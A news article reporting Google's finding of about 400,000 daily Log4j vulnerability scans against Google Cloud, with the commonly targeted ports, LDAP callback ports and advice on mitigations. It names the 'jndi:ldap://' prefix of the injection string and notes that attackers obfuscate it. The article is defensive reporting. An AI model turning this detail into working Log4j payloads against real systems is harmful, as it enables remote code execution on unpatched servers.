Google says there are as many as 400,000 scans for Log4j vulnerabilities against Google Cloud each day, suggesting that IT professionals need to continue to be vigilant and ensure that they remediate vulnerable systems.
The claim comes in Google’s Threat Horizons Executive Snapshot this month, a quarterly report from the company’s Cybersecurity Action Team. Google Cloud continues to see 400,000 scans each day, and the company believes other cloud providers are seeing similar, if not more, scanning levels.
It’s unclear whether the scanning is primarily on behalf of security researchers or adversaries, but what is clear is that this vulnerability is not simply going away any time soon as both groups continue to scan for vulnerable Log4j instances.
According to Google, the company is continuing to see 400,000 scans for Log4j vulnerabilities against Google Cloud each day, and similar scanning levels against all provides are widely expected.
The company says threat actors are predominantly targeting ports 80 and 443 with scanners sending payloads to many other ports with attack payloads largely using Lightweight Direct Access Protocol (LDAP) servers listening mostly on TCP ports 389 and 1389.
Google adds that threat actors are refining ways of obfuscating the Log4j format string, starting with jndi:ldap://” and moving more difficult to parse strings.
“Adversaries and researchers alike are continuing to scour the web looking for vulnerable instances of Log4j,” Google report says. “As a result, service providers have been and continue to work with their cloud customers to ensure the infrastructure is secure as well as check the status of customer-installed tools and third-party dependencies in their environments to see if they are affected. While adversaries continue to knock on this door, observations have shown that they are opting to use known open-source tools, native Cloud services, and previously established domains for persistence in their attacks.”
Google points Google Cloud admins to several Google Cloud-specific mitigations, including the company’s Cloud Armor solution, Java scanning feature, and threat hunting tools.
Read the company’s report for more mitigations.